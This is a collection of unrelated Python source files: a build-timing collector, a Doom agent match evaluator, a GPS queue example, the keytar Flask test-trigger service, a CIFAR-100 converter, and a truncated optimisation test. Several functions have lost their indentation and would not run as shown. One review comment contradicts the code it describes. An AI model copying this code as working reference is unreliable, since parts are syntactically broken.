        cls = child_status['classPath'].split('.')[-1]
        start = child_status.get('startTimeMs')
        end = child_status.get('endTimeMs')
        if start and end:
            # Same class seen before: bump the suffix so the earlier
            # entry is not overwritten.
            # Fix: the membership test previously checked
            # `cls + '.start'...` but keys are inserted with a 'pl.'
            # prefix, so duplicates always clobbered each other.
            if ('pl.' + cls + '.start' + suffixes.get(cls, '')) in result.keys():
                old_suffix = suffixes.get(cls, '.0')
                old_index = int(old_suffix[1:])
                suffixes[cls] = '.' + str(old_index + 1)
            result['pl.' + cls + '.start' + suffixes.get(cls, '')] = (
                _UnknownToDatetime(start))
            result['pl.' + cls + '.end' + suffixes.get(cls, '')] = (
                _UnknownToDatetime(end))
    return result
def _GetTimes(q, r):
    """Obtains times of interest from a WfAnalysis instance.
    This is meant to be run by a worker thread.

    Consumes WfAnalysis entities from queue |q| forever and puts
    (key, times_dict) tuples on result queue |r|; failures for one
    entity are printed and skipped.
    """
    while True:
        a = q.get()
        # Base times read directly off the WfAnalysis entity.
        result = {
            'wfa.build_start_time': a.build_start_time,
            'wfa.request_time': a.request_time,
            'wfa.start_time': a.start_time,
            'wfa.end_time': a.end_time,
            'wfa.updated_time': a.updated_time,
            'wfa.result_status': a.result_status,
            'wfa.build_failure_type': a.build_failure_type,
        }
        try:
            # Per-step try-job and swarming task timings.
            tryjobs_times = {}
            step_to_tryjobs = handlers_util.GetAllTryJobResults(
                a.master_name, a.builder_name, a.build_number, True)
            for step in step_to_tryjobs.keys():
                this_tryjobs = step_to_tryjobs[step]['try_jobs']
                for job in this_tryjobs:
                    if job.get('try_job_url'):
                        tryjobs_times.setdefault('try.' + step, {})
                        times = _GetTimesFromBuildbot(job['try_job_url'])
                        tryjobs_times['try.' + step].update(times)
                    if job.get('task_url'):
                        tryjobs_times.setdefault('swarm.' + step, {})
                        times = _GetTimesFromSwarming(job['task_url'])
                        tryjobs_times['swarm.' + step].update(times)
            result.update(tryjobs_times)
            if a.pipeline_status_path:
                # The pipeline id is the 'root' query parameter of the
                # status path.
                pipeline_root = re.search(r'(?<=root\=)[^&]*', a.pipeline_status_path
                                          ).group(0)
                result.update(_GetTimesFromPipeline(pipeline_root))
            r.put((a.key, result))
        except Exception, e:
            # Best-effort worker: report and move on to the next entity.
            print 'Problem with ', a.key, e
        q.task_done()
def _GetTimesFromBuildbot(buildbot_url):
    """Fetch per-step start/end times for a buildbot build via milo.

    Returns a dict mapping '<step name>.start'/'<step name>.end' to
    datetimes.
    """
    # TODO(robertocn): Use existing code that talks to milo.
    # Convert the buildbot url to request to milo.
    milo_url = ('https://luci-milo.appspot.com/prpc/'
                'milo.Buildbot/GetBuildbotBuildJSON')
    # http://build.chromium.org/p/<master>/builders/<builder>/builds/<number>
    master, _, builder, _, buildnum = str(buildbot_url).split('/')[4:]
    data = json.dumps({
        'master': master, 'builder': builder, 'buildNum': buildnum})
    _, response = CLIENT_SINGLETON.Post(
        milo_url, data, headers={'Content-Type': 'application/json'})
    # The response carries a prefix before the JSON payload; skip
    # everything up to the first '{'.
    response_json = response[response.index('{'):]
    response_data = json.loads(response_json)
    result = {}
    for step in response_data['steps']:
        if 'name' in step and 'times' in step:
            # times[0] / times[1] are the step's start / end stamps.
            result[step['name'] + '.start'] = (
                _UnknownToDatetime(step['times'][0]))
            result[step['name'] + '.end'] = (
                _UnknownToDatetime(step['times'][1]))
    return result
def _GetTimesFromSwarming(url):
    """Return the timestamp ('*_ts') fields of the swarming task behind
    |url|, converted to datetimes."""
    task_id = url.split('/')[-1]
    task_result, _ = swarming_util.GetSwarmingTaskResultById(
        task_id, CLIENT_SINGLETON)
    return dict((key, _UnknownToDatetime(value))
                for key, value in task_result.items()
                if key.endswith('_ts'))
# TODO: Instead of guessing, make the right conversions when retrieving data,
# including timezone adjustment (i.e. make everything UTC)
def _UnknownToDatetime(unknown):
if isinstance(unknown, basestring):
for fmt in ('%Y-%m-%dT%H:%M:%S.%f', '%Y-%m-%dT%H:%M:%S'):
try:
return datetime.datetime.strptime(unknown,fmt)
except ValueError:
pass
# This is only used to guess whether the time given is in seconds or ms
epoch = time.mktime(datetime.datetime(year=2008, month=9, day=2).timetuple())
try:
ts = float(unknown)
if ts > epoch:
if ts > epoch * 1000:
ts = float(ts)/1000
return datetime.datetime.fromtimestamp(ts)
except (TypeError, ValueError):
# Couldn't cast it, return the original value.
pass
return unknown
def _PrependKeys(prefix, d):
new_d = {}
for k in d.keys():
new_d[prefix + k] = d[k]
return new_d
def _Denest(d):
if isinstance(d, dict):
removals = []
insertions = {}
for k, v in d.iteritems():
if isinstance(v, dict):
insertions.update(_PrependKeys(k + '.', v))
removals.append(k)
for k in removals:
del(d[k])
d.update(insertions)
return d
# This is hacky, we should make everything UTC as the times are read from the
# source.
def _IsUtcLabel(l):
parts = l.split('.')
return len(parts) == 1 or l.startswith('waterfall.') or (
len(parts) == 2 and l.endswith('_ts'))
def main():
  """Load (or fetch) analyses, then collect step timings on worker threads.

  Results are checkpointed periodically via _SaveAnalyses so an interrupted
  run can resume from the local cache.
  """
  # TODO: add options to limit the date range to fetch
  # TODO: add options to display summary of fetched info.
  remote_api.EnableRemoteApi(app_id='findit-for-me')
  try:
    all_analyses, stored_start, stored_end, time_records = _LoadAnalyses()
  except IOError:
    # No local cache yet: fetch the whole range and start fresh.
    all_analyses = _FetchAnalyses(START_DATE, END_DATE)
    time_records = {}
    _SaveAnalyses(all_analyses, time_records)
  else:
    # Extend the cached range on either side as needed.
    if stored_start > START_DATE:
      all_analyses = _FetchAnalyses(START_DATE, stored_start) + all_analyses
    if END_DATE > stored_end:
      all_analyses += _FetchAnalyses(stored_end, END_DATE)
    _SaveAnalyses(all_analyses, time_records)
  saved_count = len(time_records)
  q = Queue.Queue()   # work queue: analyses to process
  r = Queue.Queue()   # result queue: (key, record) pairs from workers
  for _ in range(THREAD_COUNT):
    t = Thread(target=_GetTimes, args=(q, r))
    t.daemon = True
    t.start()
  for a in all_analyses:
    if a.key not in time_records.keys():
      q.put(a)
  while not (q.empty() and r.empty()):
    key, record = r.get()
    time_records[key] = _Denest(record)
    print len(time_records)
    for k, v in time_records[key].iteritems():
      if _IsUtcLabel(k) and isinstance(v, datetime.datetime):
        # Shift values judged to be UTC back 8 hours.
        # NOTE(review): hardcoded offset ignores DST — confirm acceptable.
        time_records[key][k] = v - datetime.timedelta(hours=8)
    # Checkpoint once enough new records have accumulated.
    if saved_count + THREAD_COUNT < len(time_records):
      _SaveAnalyses(all_analyses, time_records)
      saved_count = len(time_records)
      print 'Saved %d results' % saved_count
  q.join()
if __name__ == '__main__':
main()
|
multi_agent_match.py | import os
import sys
import time
from multiprocessing import Process
from os.path import join
import numpy as np
import torch
from algorithms.appooc.learner import LearnerWorker
from algorithms.appooc.model import create_actor_critic
from algorithms.utils.arguments import parse_args, load_from_checkpoint
from algorithms.utils.multi_agent_wrapper import MultiAgentWrapper, is_multiagent_env
from envs.create_env import create_env
from utils.utils import log, AttrDict
class Rival:
    """One match participant: its eval config and (lazily loaded) model."""

    def __init__(self, name, args):
        self.name = name
        self.args = args
        # Which policy checkpoint to load; assigned by multi_agent_match().
        self.policy_index = None
        self.parsed_config = parse_args(args, evaluation=True)
        self.cfg = load_from_checkpoint(self.parsed_config)
        # Filled in by multi_agent_match() once the env spaces are known.
        self.actor_critic = None
        # NOTE(review): the rest of the file reads/writes `rnn_states`
        # (plural); this singular attribute appears unused — confirm.
        self.rnn_state = None
# The two competing policies; each entry loads its own experiment config.
RIVALS = [
    Rival(name='duel',
          args=[
              '--env=doom_duel',
              '--algo=appooc',
              '--experiment=00_bots_ssl2_fs2_ppo_1',
              '--experiments_root=paper_doom_duel_v65_fs2/bots_ssl2_fs2'
          ]),
    Rival(name='duel_bots',
          args=[
              '--env=doom_duel_bots',
              '--algo=appooc',
              '--experiment=00_bots_ssl2_fs2_ppo_1',
              '--experiments_root=paper_doom_duel_bots_v65_fs2/bots_ssl2_fs2'
          ]),
]

# Environment both rivals actually play in during the match.
ENV_NAME = 'doom_duel'
NO_RENDER = True  # when True, skip env.render() and frame pacing entirely
FPS = 10000       # render pacing target when NO_RENDER is False
def multi_agent_match(policy_indices, max_num_episodes=int(1e9), max_num_frames=1e10):
    """Play the RIVALS against each other and log win/tie stats to a file.

    Args:
        policy_indices: one policy index per rival; selects which checkpoint
            each rival loads.
        max_num_episodes: stop after this many episodes.
        max_num_frames: stop once this many env frames have been simulated.
    """
    log.debug('Starting eval process with policies %r', policy_indices)
    for i, rival in enumerate(RIVALS):
        rival.policy_index = policy_indices[i]

    # Per-matchup report file next to this script, e.g. eval_0vs1.txt.
    curr_dir = os.path.dirname(os.path.abspath(__file__))
    evaluation_filename = join(curr_dir,
                               f'eval_{"vs".join([str(pi) for pi in policy_indices])}.txt')
    with open(evaluation_filename, 'w') as fobj:
        fobj.write('start\n')

    common_config = RIVALS[0].cfg

    render_action_repeat = common_config.render_action_repeat if common_config.render_action_repeat is not None else common_config.env_frameskip
    if render_action_repeat is None:
        log.warning('Not using action repeat!')
        render_action_repeat = 1
    log.debug('Using action repeat %d during evaluation', render_action_repeat)

    common_config.env_frameskip = 1  # for evaluation
    common_config.num_envs = 1
    common_config.timelimit = 4.0  # for faster evaluation

    def make_env_func(env_config):
        return create_env(ENV_NAME, cfg=common_config, env_config=env_config)

    env = make_env_func(AttrDict({'worker_index': 0, 'vector_index': 0}))
    env.seed(0)

    is_multiagent = is_multiagent_env(env)
    if not is_multiagent:
        env = MultiAgentWrapper(env)
    else:
        assert env.num_agents == len(RIVALS)

    device = torch.device('cuda')
    # Build each rival's network and load its checkpoint.
    for rival in RIVALS:
        rival.actor_critic = create_actor_critic(rival.cfg, env.observation_space, env.action_space)
        rival.actor_critic.model_to_device(device)
        policy_id = rival.policy_index
        checkpoints = LearnerWorker.get_checkpoints(
            LearnerWorker.checkpoint_dir(rival.cfg, policy_id))
        checkpoint_dict = LearnerWorker.load_checkpoint(checkpoints, device)
        rival.actor_critic.load_state_dict(checkpoint_dict['model'])

    episode_rewards = []
    num_frames = 0

    last_render_start = time.time()

    def max_frames_reached(frames):
        return max_num_frames is not None and frames > max_num_frames

    wins = [0 for _ in RIVALS]
    ties = 0
    frag_differences = []

    with torch.no_grad():
        for _ in range(max_num_episodes):
            obs = env.reset()
            obs_dict_torch = dict()

            done = [False] * len(obs)
            # Fresh recurrent state for every rival at episode start.
            for rival in RIVALS:
                rival.rnn_states = torch.zeros([1, rival.cfg.hidden_size],
                                               dtype=torch.float32,
                                               device=device)

            episode_reward = 0
            prev_frame = time.time()

            while True:
                actions = []
                # Each rival acts on its own observation with its own RNN state.
                for i, obs_dict in enumerate(obs):
                    for key, x in obs_dict.items():
                        obs_dict_torch[key] = torch.from_numpy(x).to(device).float().view(
                            1, *x.shape)

                    rival = RIVALS[i]
                    policy_outputs = rival.actor_critic(obs_dict_torch, rival.rnn_states)
                    rival.rnn_states = policy_outputs.rnn_states
                    actions.append(policy_outputs.actions[0].cpu().numpy())

                for _ in range(render_action_repeat):
                    if not NO_RENDER:
                        # Pace rendering to at most FPS frames per second.
                        target_delay = 1.0 / FPS if FPS > 0 else 0
                        current_delay = time.time() - last_render_start
                        time_wait = target_delay - current_delay

                        if time_wait > 0:
                            # log.info('Wait time %.3f', time_wait)
                            time.sleep(time_wait)

                        last_render_start = time.time()
                        env.render()

                    obs, rew, done, infos = env.step(actions)

                    if all(done):
                        log.debug('Finished episode!')
                        # Positive frag difference means rival 0 won.
                        frag_diff = infos[0]['PLAYER1_FRAGCOUNT'] - infos[0]['PLAYER2_FRAGCOUNT']
                        if frag_diff > 0:
                            wins[0] += 1
                        elif frag_diff < 0:
                            wins[1] += 1
                        else:
                            ties += 1
                        frag_differences.append(frag_diff)
                        avg_frag_diff = np.mean(frag_differences)
                        report = f'wins: {wins}, ties: {ties}, avg_frag_diff: {avg_frag_diff}'
                        with open(evaluation_filename, 'a') as fobj:
                            fobj.write(report + '\n')

                    # log.info('%d:%d', infos[0]['PLAYER1_FRAGCOUNT'], infos[0]['PLAYER2_FRAGCOUNT'])

                    episode_reward += np.mean(rew)
                    num_frames += 1

                    if num_frames % 100 == 0:
                        log.debug('%.1f', render_action_repeat / (time.time() - prev_frame))
                    prev_frame = time.time()

                    if all(done):
                        log.info('Episode finished at %d frames', num_frames)
                        break

                if all(done) or max_frames_reached(num_frames):
                    break

            if not NO_RENDER:
                env.render()
                time.sleep(0.01)

            episode_rewards.append(episode_reward)
            last_episodes = episode_rewards[-100:]
            avg_reward = sum(last_episodes) / len(last_episodes)
            log.info(
                'Episode reward: %f, avg reward for %d episodes: %f',
                episode_reward,
                len(last_episodes),
                avg_reward,
            )

            if max_frames_reached(num_frames):
                break

    env.close()
def main():
    """Script entry point: run 8 policy matchups, each in its own process."""
    multi_process = True
    if not multi_process:
        multi_agent_match((0, 0))
        return 0

    num_policies = 8
    workers = []
    for policy_id in range(num_policies):
        # Each worker plays policy `policy_id` against policy 0.
        worker = Process(target=multi_agent_match, args=[(policy_id, 0)])
        worker.start()
        workers.append(worker)
        time.sleep(5.0)  # stagger startup
    for worker in workers:
        worker.join()
    return 0
if __name__ == '__main__':
sys.exit(main())
|
QueuesExample.py | import time
import queue
import threading
import pyxa1110
framesQueue = queue.Queue()
runEvent = threading.Event()
runEvent.set()
def fetchData ():
    """Producer: read frames from the GPS device and enqueue their ASCII form.

    Runs until the shared runEvent is cleared by the main thread.
    """
    with pyxa1110.GPS() as gps:
        while runEvent.is_set():
            gps.receiveData()
            framesQueue.put(gps.ascii())
def flushQueue ():
    """Consumer: print queued GPS frames until the run event is cleared.

    Blocks on the queue with a 0.5 s timeout instead of sleeping and then
    polling non-blockingly: frames are printed as soon as they arrive while
    the loop still notices runEvent being cleared at least twice a second.
    """
    while runEvent.is_set():
        try:
            item = framesQueue.get(timeout=0.5)
        except queue.Empty:
            continue
        # gps.ascii() may yield None for empty reads — TODO confirm.
        if item is not None:
            print(item)
        # Mark the item processed so the queue's unfinished-task count
        # stays consistent.
        framesQueue.task_done()
threads = []
# Thread that retrieves data from the GPS device (producer).
t1 = threading.Thread(target = fetchData)
t1.start()
threads.append(t1)
# Thread that prints data when available (consumer).
t2 = threading.Thread(target = flushQueue)
t2.start()
threads.append(t2)
try:
    # Idle main thread; Ctrl-C triggers the shutdown path below.
    while 1:
        time.sleep(.1)
except KeyboardInterrupt:
    print("\nClosing app...")
    runEvent.clear()
    # NOTE(review): nothing joins the queue and the consumer never calls
    # task_done(), so this lone task_done() looks spurious — confirm intent.
    framesQueue.task_done()
    for t in threads:
        t.join()
    print("App closed")
|
keytar.py | #!/usr/bin/env python
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Keytar flask app.
This program is responsible for exposing an interface to trigger cluster level
tests. For instance, docker webhooks can be configured to point to this
application in order to trigger tests upon pushing new docker images.
"""
import argparse
import collections
import datetime
import json
import logging
import os
import Queue
import shutil
import subprocess
import tempfile
import threading
import yaml
import flask
app = flask.Flask(__name__)
results = collections.OrderedDict()
_TEMPLATE = (
'python {directory}/test_runner.py -c "{config}" -t {timestamp} '
'-d {tempdir} -s {server}')
class KeytarError(Exception):
  """Base exception for keytar request/validation failures."""
  pass
def run_test_config(config):
"""Runs a single test iteration from a configuration."""
tempdir = tempfile.mkdtemp()
logging.info('Fetching github repository')
# Get the github repo and clone it.
github_config = config['github']
github_clone_args, github_repo_dir = _get_download_github_repo_args(
tempdir, github_config)
os.makedirs(github_repo_dir)
subprocess.call(github_clone_args)
current_dir = os.getcwd()
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M')
results[timestamp] = {
'timestamp': timestamp,
'status': 'Start',
'tests': {},
'docker_image': config['docker_image']
}
# Generate a test script with the steps described in the configuration,
# as well as the command to execute the test_runner.
with tempfile.NamedTemporaryFile(dir=tempdir, delete=False) as f:
tempscript = f.name
f.write('#!/bin/bash\n')
if 'before_test' in config:
# Change to the github repo directory, any steps to be run before the
# tests should be executed from there.
os.chdir(github_repo_dir)
for before_step in config['before_test']:
f.write('%s\n' % before_step)
server = 'http://localhost:%d' % app.config['port']
f.write(_TEMPLATE.format(
directory=current_dir, config=yaml.dump(config), timestamp=timestamp,
tempdir=tempdir, server=server))
os.chmod(tempscript, 0775)
try:
subprocess.call([tempscript])
except subprocess.CalledProcessError as e:
logging.warn('Error running test_runner: %s', str(e))
finally:
os.chdir(current_dir)
shutil.rmtree(tempdir)
@app.route('/')
def index():
  """Serve the static landing page."""
  return app.send_static_file('index.html')
@app.route('/test_results')
def test_results():
  """Return all recorded test results as a JSON list, ordered by timestamp."""
  return json.dumps([results[x] for x in sorted(results)])
@app.route('/test_log')
def test_log():
  # Fetch the output from a test.
  # basename() strips path components so the request cannot escape the log
  # directory.
  log = '%s.log' % os.path.basename(flask.request.values['log_name'])
  # NOTE(review): 'text/css' for a log file looks odd — plain text
  # intended? confirm.
  return (flask.send_from_directory('/tmp/testlogs', log), 200,
          {'Content-Type': 'text/css'})
@app.route('/update_results', methods=['POST'])
def update_results():
  """Merge a status update (JSON body) into the results entry it names."""
  # Update the results dict, called from the test_runner.
  update_args = flask.request.get_json()
  timestamp = update_args['timestamp']
  results[timestamp].update(update_args)
  return 'OK'
def _validate_request(keytar_password, request_values):
"""Checks a request against the password provided to the service at startup.
Raises an exception on errors, otherwise returns None.
Args:
keytar_password: password provided to the service at startup.
request_values: dict of POST request values provided to Flask.
Raises:
KeytarError: raised if the password is invalid.
"""
if keytar_password:
if 'password' not in request_values:
raise KeytarError('Expected password not provided in test_request!')
elif request_values['password'] != keytar_password:
raise KeytarError('Incorrect password passed to test_request!')
@app.route('/test_request', methods=['POST'])
def test_request():
  """Respond to a post request to execute tests.

  This expects a json payload containing the docker webhook information.
  If this app is configured to use a password, the password should be passed in
  as part of the POST request.

  Returns:
    HTML response.
  """
  try:
    _validate_request(app.config['password'], flask.request.values)
  except KeytarError as e:
    flask.abort(400, str(e))
  webhook_data = flask.request.get_json()
  repo_name = webhook_data['repository']['repo_name']
  # Run every configured test whose docker_image matches the pushed repo.
  test_configs = [c for c in app.config['keytar_config']['config']
                  if c['docker_image'] == repo_name]
  if not test_configs:
    return 'No config found for repo_name: %s' % repo_name
  for test_config in test_configs:
    test_worker.add_test(test_config)
  return 'OK'
def handle_cluster_setup(cluster_setup):
  """Setups up a cluster.

  Currently only GKE is supported. This step handles setting up credentials and
  ensuring a valid project name is used.

  Args:
    cluster_setup: YAML cluster configuration.

  Raises:
    KeytarError: raised on invalid setup configurations.
  """
  if cluster_setup['type'] != 'gke':
    return
  if 'keyfile' not in cluster_setup:
    raise KeytarError('No keyfile found in GKE cluster setup!')
  # Add authentication steps to allow keytar to start clusters on GKE.
  gcloud_args = ['gcloud', 'auth', 'activate-service-account',
                 '--key-file', cluster_setup['keyfile']]
  logging.info('authenticating using keyfile: %s', cluster_setup['keyfile'])
  subprocess.call(gcloud_args)
  os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = cluster_setup['keyfile']
  # Ensure that a project name is correctly set. Use the name if provided
  # in the configuration, otherwise use the current project name, or else
  # the first available project name.
  if 'project_name' in cluster_setup:
    logging.info('Setting gcloud project to %s', cluster_setup['project_name'])
    subprocess.call(
        ['gcloud', 'config', 'set', 'project', cluster_setup['project_name']])
  else:
    config = subprocess.check_output(
        ['gcloud', 'config', 'list', '--format', 'json'])
    project_name = json.loads(config)['core']['project']
    if not project_name:
      # BUG FIX: `gcloud projects list` returns raw text, so indexing the
      # output as projects[0]['projectId'] indexed a character of a string.
      # Request JSON output and parse it instead.
      projects = json.loads(subprocess.check_output(
          ['gcloud', 'projects', 'list', '--format', 'json']))
      first_project = projects[0]['projectId']
      logging.info('gcloud project is unset, setting it to %s', first_project)
      subprocess.check_output(
          ['gcloud', 'config', 'set', 'project', first_project])
def handle_install_steps(keytar_config):
  """Runs all config installation/setup steps.

  Args:
    keytar_config: YAML keytar configuration.
  """
  if 'install' not in keytar_config:
    return
  install_config = keytar_config['install']
  for cluster_setup in install_config.get('cluster_setup', []):
    handle_cluster_setup(cluster_setup)
  # Install any dependencies using apt-get.
  if 'dependencies' in install_config:
    subprocess.call(['apt-get', 'update'])
    # Avoid interactive debconf prompts during unattended installs.
    os.environ['DEBIAN_FRONTEND'] = 'noninteractive'
    for dep in install_config['dependencies']:
      subprocess.call(
          ['apt-get', 'install', '-y', '--no-install-recommends', dep])
  # Run any additional commands if provided.
  for step in install_config.get('extra', []):
    os.system(step)
  # Update path environment variable.
  for path in install_config.get('path', []):
    os.environ['PATH'] = '%s:%s' % (path, os.environ['PATH'])
def _get_download_github_repo_args(tempdir, github_config):
"""Get arguments for github actions.
Args:
tempdir: Base directory to git clone into.
github_config: Configuration describing the repo, branches, etc.
Returns:
([string], string) for arguments to pass to git, and the directory to
clone into.
"""
repo_prefix = github_config.get('repo_prefix', 'github')
repo_dir = os.path.join(tempdir, repo_prefix)
git_args = ['git', 'clone', 'https://github.com/%s' % github_config['repo'],
repo_dir]
if 'branch' in github_config:
git_args += ['-b', github_config['branch']]
return git_args, repo_dir
class TestWorker(object):
  """A simple test queue. HTTP requests append to this work queue."""

  def __init__(self):
    self.test_queue = Queue.Queue()  # Python 2 `Queue` module.
    self.worker_thread = threading.Thread(target=self.worker_loop)
    # Daemon thread: a pending test never blocks interpreter shutdown.
    self.worker_thread.daemon = True

  def worker_loop(self):
    # Run forever, executing tests as they are added to the queue.
    while True:
      item = self.test_queue.get()
      run_test_config(item)
      self.test_queue.task_done()

  def start(self):
    """Begin processing queued test configs on the background thread."""
    self.worker_thread.start()

  def add_test(self, config):
    """Enqueue a test configuration for asynchronous execution."""
    self.test_queue.put(config)
test_worker = TestWorker()
def main():
  """Parse flags, load the keytar config, run setup steps, start the app."""
  logging.getLogger().setLevel(logging.INFO)
  parser = argparse.ArgumentParser(description='Run keytar')
  parser.add_argument('--config_file', help='Keytar config file', required=True)
  parser.add_argument('--password', help='Password', default=None)
  parser.add_argument('--port', help='Port', default=8080, type=int)
  keytar_args = parser.parse_args()
  with open(keytar_args.config_file, 'r') as yaml_file:
    yaml_config = yaml_file.read()
  if not yaml_config:
    raise ValueError('No valid yaml config!')
  # safe_load: the config needs only plain YAML types, while yaml.load can
  # instantiate arbitrary Python objects from the file.
  keytar_config = yaml.safe_load(yaml_config)
  handle_install_steps(keytar_config)
  if not os.path.isdir('/tmp/testlogs'):
    os.mkdir('/tmp/testlogs')
  test_worker.start()
  app.config['port'] = keytar_args.port
  app.config['password'] = keytar_args.password
  app.config['keytar_config'] = keytar_config
  # NOTE(review): debug=True enables the Werkzeug debugger/reloader; confirm
  # this service is never exposed publicly with it on.
  app.run(host='0.0.0.0', port=keytar_args.port, debug=True)
if __name__ == '__main__':
main()
|
cifar100_to_mr.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar100 convert tool for MindRecord.
"""
from importlib import import_module
import os

import numpy as np

from mindspore import log as logger

from .cifar100 import Cifar100
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, FAILED, SUCCESS
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar100ToMR']
class Cifar100ToMR:
    """
    A class to transform from cifar100 to MindRecord.

    Args:
        source (str): the cifar100 directory to be transformed.
        destination (str): the MindRecord file path to transform into.

    Raises:
        ValueError: If source or destination is invalid.
    """

    def __init__(self, source, destination):
        check_filename(source)
        self.source = source

        # Both the "train" and "test" subsets must be present.
        files = os.listdir(self.source)
        train_data_flag = False
        test_data_flag = False
        for file in files:
            if file == "train":
                train_data_flag = True
            if file == "test":
                test_data_flag = True
        if not train_data_flag:
            raise PathNotExistsError("train")
        if not test_data_flag:
            raise PathNotExistsError("test")

        check_filename(destination)
        self.destination = destination
        self.writer = None

    def run(self, fields=None):
        """
        Execute transformation from cifar100 to MindRecord.

        Args:
            fields (list[str]): A list of index field, e.g.["fine_label", "coarse_label"].

        Returns:
            MSRStatus, whether cifar100 is successfully transformed to MindRecord.
        """
        if fields and not isinstance(fields, list):
            raise ValueError("The parameter fields should be None or list")

        cifar100_data = Cifar100(self.source, False)
        cifar100_data.load_data()

        images = cifar100_data.images
        logger.info("train images: {}".format(images.shape))
        fine_labels = cifar100_data.fine_labels
        logger.info("train images fine label: {}".format(fine_labels.shape))
        coarse_labels = cifar100_data.coarse_labels
        logger.info("train images coarse label: {}".format(coarse_labels.shape))

        test_images = cifar100_data.Test.images
        logger.info("test images: {}".format(test_images.shape))
        test_fine_labels = cifar100_data.Test.fine_labels
        # BUG FIX: the two log lines below previously formatted the *train*
        # label shapes instead of the test label shapes.
        logger.info("test images fine label: {}".format(test_fine_labels.shape))
        test_coarse_labels = cifar100_data.Test.coarse_labels
        logger.info("test images coarse label: {}".format(test_coarse_labels.shape))

        data_list = _construct_raw_data(images, fine_labels, coarse_labels)
        test_data_list = _construct_raw_data(test_images, test_fine_labels, test_coarse_labels)

        # FAILED comes from ..shardutils (see imports); it was previously
        # referenced here without being imported, so the failure path raised
        # NameError instead of returning a status.
        if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
            return FAILED
        if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
            return FAILED
        return SUCCESS

    def transform(self, fields=None):
        """
        Run the conversion in a worker thread and re-raise any failure.

        Args:
            fields (list[str]): optional index fields forwarded to run().

        Returns:
            MSRStatus, result of run().
        """
        t = ExceptionThread(target=self.run, kwargs={'fields': fields})
        t.daemon = True
        t.start()
        t.join()
        if t.exitcode != 0:
            raise t.exception
        return t.res
def _construct_raw_data(images, fine_labels, coarse_labels):
    """
    Construct raw data from cifar100 data.

    Args:
        images (list): image list from cifar100.
        fine_labels (list): fine label list from cifar100.
        coarse_labels (list): coarse label list from cifar100.

    Returns:
        list[dict], data dictionary constructed from cifar100.

    Raises:
        ModuleNotFoundError: if opencv-python (cv2) is unavailable.
    """
    if not cv2:
        raise ModuleNotFoundError("opencv-python module not found, please use pip install it.")

    raw_data = []
    for i, img in enumerate(images):
        # np.int was removed in NumPy 1.24; the builtin int is equivalent here.
        fine_label = int(fine_labels[i][0])
        coarse_label = int(coarse_labels[i][0])
        # Reverse the channel order before JPEG-encoding with cv2.
        _, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
        row_data = {"id": int(i),
                    "data": img.tobytes(),
                    "fine_label": int(fine_label),
                    "coarse_label": int(coarse_label)}
        raw_data.append(row_data)
    return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
    """
    Generate MindRecord file from raw data.

    Args:
        file_name (str): File name of MindRecord File.
        fields (list[str]): Fields would be set as index which
            could not belong to blob fields and type could not be 'array' or 'bytes'.
        raw_data (dict): Dict of raw data.
        schema_desc (str): String of schema description.

    Returns:
        MSRStatus, whether successfully written into MindRecord.
    """
    # Fixed schema matching the rows built by _construct_raw_data.
    schema = {"id": {"type": "int64"}, "fine_label": {"type": "int64"},
              "coarse_label": {"type": "int64"}, "data": {"type": "bytes"}}
    logger.info("transformed MindRecord schema is: {}".format(schema))

    writer = FileWriter(file_name, 1)
    writer.add_schema(schema, schema_desc)
    if fields and isinstance(fields, list):
        writer.add_index(fields)
    writer.write_raw_data(raw_data)
    return writer.commit()
|
test_noisysine.py | import sys
import time
import logging
import threading
import GPy
import numpy as np
import matplotlib.pyplot as plt
import pdb
from GPhelpers import *
from IPython.display import display
from poap.strategy import FixedSampleStrategy
from poap.strategy import InputStrategy
from poap.tcpserve import ThreadedTCPServer
from poap.tcpserve import SimpleSocketWorker
from scipy.stats import norm
# Set up default host, port, and time
TIMEOUT = .2
def f(x):
    """Test objective: 5*sin(x), delayed by TIMEOUT seconds to mimic an
    expensive evaluation."""
    logging.info("Request for {0}".format(x))
    if TIMEOUT > 0:
        time.sleep(TIMEOUT)
    logging.info("OK, done")
    return 5*np.sin(x)
def worker_main(name):
    """Run a socket worker evaluating f(); `name` is the controller's
    (host, port) socket name."""
    logging.info("Launching worker on port {0}".format(name[1]))
    SimpleSocketWorker(f, sockname=name, retries=1).run()
def main():
    """Drive a batched Bayesian-optimization loop over f() with POAP workers.

    Seeds an initial random batch, launches a controller thread plus worker
    threads, then repeatedly fits a GP to completed evaluations and submits
    new batches chosen by expected improvement.
    """
    logging.basicConfig(format="%(name)-18s: %(levelname)-8s %(message)s",
                        level=logging.INFO)
    # Launch controller, server
    strategy = FixedSampleStrategy([])
    server = ThreadedTCPServer()
    initbatchsize = 20
    tstrategy = InputStrategy(server.controller, strategy);
    X = np.random.uniform(-3.,3.,(initbatchsize,1))
    # NOTE(review): Y is assigned but never used below — confirm it can go.
    Y = np.ones([len(X), 1])
    for k in X:
        tstrategy.eval(k)
    server.strategy = tstrategy
    cthread = threading.Thread(target=server.run)
    cthread.start()
    # Get controller port
    name = server.sockname
    logging.info("Launch controller at {0}".format(name))
    # Launch workers on local machine
    numworkers = 5;
    wthreads = []
    for k in range(numworkers):
